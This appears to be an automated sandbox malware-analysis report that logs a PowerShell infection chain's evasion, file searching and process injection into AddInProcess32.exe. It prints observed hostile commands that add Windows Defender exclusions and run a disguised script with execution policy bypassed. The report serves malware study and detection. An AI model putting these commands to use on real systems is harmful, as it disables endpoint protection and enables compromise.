                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 00000006.00000002.2160885075.00000197AAB82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040F7E2 Sleep,ExitProcess,22_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,22_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2501Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 707Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3506Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6233Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7892Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1598Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7598Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1124Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2155Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1034Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2209
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 2503
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 993
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 804
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 6.2 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 9.7 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep count: 3506 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 6233 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep count: 7892 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 1598 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep count: 7598 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 1124 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 2155 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 103 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 1034 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 76 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7808Thread sleep time: -74500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7812Thread sleep time: -6627000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7812Thread sleep time: -7509000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 993 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 187 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 804 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 100 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,16_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10006580 FindFirstFileExA,16_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,22_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,22_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,22_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00407877 FindFirstFileW,FindNextFileW,22_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0044E8F9 FindFirstFileExA,22_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,22_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,27_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,29_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,22_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00418981 memset,GetSystemInfo,27_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3038298129.000001D6423B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Hyper-V
                    Source: powershell.exe, 00000004.00000002.3038298129.000001D6423B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmtoolsd
                    Source: powershell.exe, 00000004.00000002.3035221776.000001D642190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe3%SystemRoot%\system32\mswsock.dll
                    Source: powershell.exe, 0000000D.00000002.2755550893.0000021AF47E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,22_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10004AB4 mov eax, dword ptr fs:[00000030h]16_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00443355 mov eax, dword ptr fs:[00000030h]22_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_1000724E GetProcessHeap,16_2_1000724E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00434BD8 SetUnhandledExceptionFilter,22_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi64_3200.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 696008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 8B0008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
